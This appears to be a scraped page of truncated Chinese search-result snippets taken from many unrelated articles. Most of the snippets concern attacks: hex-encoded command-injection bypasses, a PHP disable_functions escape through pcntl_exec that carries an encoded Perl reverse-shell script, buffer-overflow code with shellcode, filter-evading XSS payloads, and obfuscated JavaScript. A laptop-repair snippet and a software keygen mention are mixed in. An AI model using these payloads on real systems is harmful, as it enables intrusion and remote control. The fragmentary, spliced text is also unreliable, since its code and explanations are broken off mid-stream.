. && whoami //不执行whoami 0x02 Linux(区分大小写) 2.1 linux下的符号和逻辑运算符 linux中变量使用$来引用,;表示命令结束无论命令是否执行成功都会执行下一个命令...m$(sdf)i 2.4 linux切割字符串(linux区分大小写) 在linux中切割字符串的语法是${NAME:start:length} 与Windows相同这里不在赘述,只要区分大小写就可以...cat flag.php -> \x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70 #经测试,发现在php的ping环境上执行失败。...在linux系统上执行成功 $(printf "\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70") {printf,"\x63\x61\x74\x20\...x66\x6c\x61\x67\x2e\x70\x68\x70"}|bash `{printf,"\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70"}`
x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61...\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x0c\x00\x8e\x00\x8f\x01\x00\x10\x6a\x61\x76\x61\...\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x01\...\x6c\x6f\x61\x64\x43\x6c\x61\x73\x73\x01\x00\x25\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\...\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\
今天就介绍一款我个人觉得非常牛逼的渗透测试框架,———PentestDB(https://github.com/alpha1e0/pentestdb.git) 安装 PentestDB支持windows/linux...git clone https://github.com/alpha1e0/pentestdb.git 安装依赖: 项目中的脚本文件依赖于lxml,linux系统一般默认安装lxml,如果没有可通过以下方式安装...linux是不需要的。...pen.py decode -t base64 5ZOI5ZOI pen.py decode -m utf8 aaa%E5%93%88%E5%93%88 pen.py encode -t hex "\x61...\x61\xe5\x93\x88\xe5\x93\x88" # 推测编码 pen.py decode -d "\x61\x61\xe5\x93\x88\xe5\x93\x88" 我就列举了一些常用的功能
> pcntl_exec PHP 4 >= 4.2.0, PHP 5 on linux #/tmp/hack.sh #!/bin/bash ls -l / #exec.php x61\x6e\x64\x6c\x65"...."\x6f\x74\x6f\x62\x79\x6e\x61\x6d\x65\x28\x22\x74\x63\x70\x22\x29\x3b\x0d\x0a\x6d\x79\x20\x24"...."\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x20\x3d\x20\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69\x6e"...."\x63\x74\x28\x53\x4f\x43\x4b\x2c\x24\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x29\x20\x6f\x72\x20".
x75\x73\x65 \x73\x74\x72\x69\x63\x74';var I1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x63\x72\x65\x61...\x69\x62\x75\x74\x65']('\x73\x72\x63','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6c\x69\x62\x2e\x73\x69\x6e\x61...\x61\x70\x70\x2e\x63\x6f\x6d\x2f\x6a\x73\x2f\x6a\x71\x75\x65\x72\x79\x2f\x32\x2e\x30\x2e\x33\x2f\x6a\...\x69\x6d\x61\x72\x79\x2d\x2d\x32\x77\x62\x4d\x69')[0]['\x63\x6c\x69\x63\x6b']()}}$('\x2e\x61\x6e\x74\...\x64']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](I1);window["\x61\x6c\x65\x72\x74"]("\u7a7a\u6728
0x19acdd){_0x5bd244=_0x5bd244-0x0;var _0x18950a=_0x36e0[_0x5bd244];if(_0x036e['\x69\x6e\x69\x74\x69\x61...\x74\x61']={};_0x036e['\x69\x6e\x69\x74\x69\x61\x6c\x69\x7a\x65\x64']=!!...[];}if(_0x036e['\x64\x61\x74\x61'][_0x5bd244]===undefined){_0x18950a=_0x036e['\x62\x61\x73\x65\x36\x34...\x44\x65\x63\x6f\x64\x65\x55\x6e\x69\x63\x6f\x64\x65'](_0x18950a);_0x036e['\x64\x61\x74\x61'][_0x5bd244...]=_0x18950a;}else{_0x18950a=_0x036e['\x64\x61\x74\x61'][_0x5bd244];}return _0x18950a;};function password
x5c" "\x20\x2f\xfe\xa4\x71\x5b\x77\x7f\xba\x3e\xad\xa9\xd8\xb2\x11\x2a" "\x34\x29\xa4\xc3\xa4\xef\x88\x61...\x0a\xa1\x61\xcb\x87\xf7\x18\x60" "\x60\x2e\x9b\x7a\xfd\x9f\x30\x06\x36\x62\x62\x6e\xd1\xa2\x11\x39"...Syser Kernel Debugger v1.99.1900.1185 KeyGen Binary Ninja Personal 2.0.2097 dev + license (Windows + Linux
3、suid提权 SUID代表设置的用户ID,是一种Linux功能,允许用户在指定用户的许可下执行文件。例如,Linux ping命令通常需要root权限才能打开原始网络套接字。...在Linux中我们将cookie信息称为canary。.../python import sys, socket EIP = "\xd1\xf2\xff\xbf" junk = "A"*732 NOP = "\x90" * 16 # msfvenom -p linux...\x58\x49\x4c\x49\x48\x4b\x50\x6a\x51\x56\x51\x48\x68\x4d" "\x4b\x30\x42\x4a\x53\x35\x50\x58\x45\x61\x6f..." "\x63\x52\x4b\x77\x4a\x52\x61\x30\x7a\x75\x32\x62\x67\x31\x62" "\x54\x6f\x57\x31\x75\x35\x33\x71\x43
阅读更多 场景:原来Lenovo X61内置的硬盘为120G,买了一个Lenovo 320G的移动硬盘,于是想将320G的换到本本里面,将原来本本内置的硬盘拆出来当移动硬盘。...拆下鸟枪,拆X61内置的120G硬盘: 正常使用的放置,关机,合上小黑,将本本先倒一个个。...问题:从来都是从裸机开始安装操作系统,这X61也太牛X了 ? ,有个恢复分区,即一键恢复程序,七七八八的,怎么就整理成这样的样子呢?奇怪。。。 ?...参考资料: X61换硬盘 trueimage clone 后无法新硬盘启动 http://www.thinkpad.cn/forum/tid681542 ThinkPad经典问题汇总 http:/
php的mail函数在执行过程中会默认调用系统程序/usr/sbin/sendmail,如果我们能劫持sendmail程序,再用mail函数来触发就能实现我们的目的 利用原理 LD_PRELOAD是Linux...四.利用pcntl_exec突破disable_functions pcntl是linux下的一个扩展,可以支持php的多线程操作。..."\x53\x6f\x63\x6b\x65\x74\x3b\x0d\x0a\x75\x73\x65\x20\x49\x4f\x3a\x3a\x48\x61\x6e\x64\x6c\x65"...."\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x20\x3d\x20\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69\x6e"...."\x63\x74\x28\x53\x4f\x43\x4b\x2c\x24\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x29\x20\x6f\x72\x20".
\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61...\x6c\x49\x72\x4c" buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57" buf += b"\x69\x52\x7a...\x46\x73\x62\x6b\x4e\x69" buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62" buf += b"\x6b..." buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54" buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f...\x71\x62\x39\x70\x5a\x6f" buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b" buf += b"\x4d
filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux...; CPE: cpe:/o:linux:linux_kernel Service detection performed....代码复制出来放到https://beautifier.io/进行美化并把里面的HTML实体去除,得到下面的结果 javascript: (function() { var _0x4b18 = ["\x76\x61...x72\x5F\x6C\x6F\x67\x69\x6E", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x63\x6C\x61...\x76\x65", "\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64", "\x31\x31\x64\x65\x73\x30\x30\x38\
x12\x21\x00\xff\xff\xc0\x02\x00\xff\xc3\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7a\x6f\x6e\x25\x61...\x3e\x48\x31\x25\x43\x2b\x61\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\...Navicat反制 5.1 反制条件准备 环境准备: Navicat12试用版 攻击机:linux 靶机:Windows server 2012、Windows10 所需要的条件:正常安装版本的Navicat...\x3e\x48\x31\x25\x43\x2b\x61\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\...使用Navicat的免安装版本(注意版权问题,支持正版) 当然,现在还有一些问题,因为时间的问题,我没有细细学习,比如对于linux下的mysql命令行是否能够进行反制?
; $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput 3、Pcntl组件 pcntl是PHP在Linux..."\x53\x6f\x63\x6b\x65\x74\x3b\x0d\x0a\x75\x73\x65\x20\x49\x4f\x3a\x3a\x48\x61\x6e\x64\x6c\x65"...."\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x20\x3d\x20\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69\x6e"...."\x63\x74\x28\x53\x4f\x43\x4b\x2c\x24\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x29\x20\x6f\x72\x20"....与引用的库一起链接打包到可执行文件中,因此为静态链接 动态链接:在静态情况下,它把库直接加载到程序里,而在动态链接的时候,只是保留接口,将动态库与程序代码独立 (2)LD_PRELOAD LD_PRELOAD是Linux
(1))(1) jQuery.globalEval(location.hash.slice(1)) document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61...x63\x72\x69\x70\x74\x3e` document.getElementById('xx').innerHTML=`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61...\x63\x72\x69\x70\x74\x3e` 0x03 当括号被过滤执行任意payload的方法 document.write`\x3c\x73\x63\x72\x69\x70\x74\x3e\x61...x6D;g src=x onerror=a...x6C;ert(document.doma
x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00...\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\...\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\...\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\...x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00
安装 从这里下载最新版本,或使用命令 git clone https://github.com/alpha1e0/pentestdb.git clone到本地 PentestDB支持Windows/Linux.../MacOS,需使用python 2.6.x 或 2.7.x运行 2.1 解决lxml依赖 项目中的脚本文件依赖于lxml linux系统一般默认安装lxml,如果没有可通过以下方式安装: pip install...pen.py decode -t base64 5ZOI5ZOI pen.py decode -m utf8 aaa%E5%93%88%E5%93%88 pen.py encode -t hex "\x61...\x61\xe5\x93\x88\xe5\x93\x88" # 推测编码 pen.py decode -d "\x61\x61\xe5\x93\x88\xe5\x93\x88" 3.1.10 文件处理功能
x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03" "\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61...\x3D\x6A\x0A\x38\x1E\x75\xA9" "\x33\xDB\x53\x68\x74\x20\x00\x00\x68\x69\x6b\x61\x73\x68\x53\x61"...\x3D\x6A\x0A\x38\x1E\x75\xA9" "\x33\xDB\x53\x68\x74\x20\x00\x00\x68\x69\x6b\x61\x73\x68\x53\x61"...\x3D\x6A\x0A\x38\x1E\x75\xA9" "\x33\xDB\x53\x68\x74\x20\x00\x00\x68\x69\x6b\x61\x73\x68\x53\x61"...\x3D\x6A\x0A\x38\x1E\x75\xA9" "\x33\xDB\x53\x68\x74\x20\x00\x00\x68\x69\x6b\x61\x73\x68\x53\x61"
x3D\x3D\x32\x5B\x22\x6B\x22\x5D\x26\x26\x27\x34\x27\x21\x3D\x32\x5B\x22\x6B\x22\x5D\x29\x7B\x33\x2E\x61...x3D\x3D\x32\x5B\x22\x6C\x22\x5D\x26\x26\x27\x34\x27\x21\x3D\x32\x5B\x22\x6C\x22\x5D\x29\x7B\x33\x2E\x61...\x75\x74\x6F\x7C\x69\x66\x7C\x73\x74\x79\x6C\x65\x7C\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x7C\x76\x61\...\x74\x65\x7C\x75\x73\x65\x72\x7C\x73\x65\x6C\x65\x63\x74\x7C\x69\x6D\x70\x6F\x72\x74\x61\x6E\x74\x7C\...\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
云直播
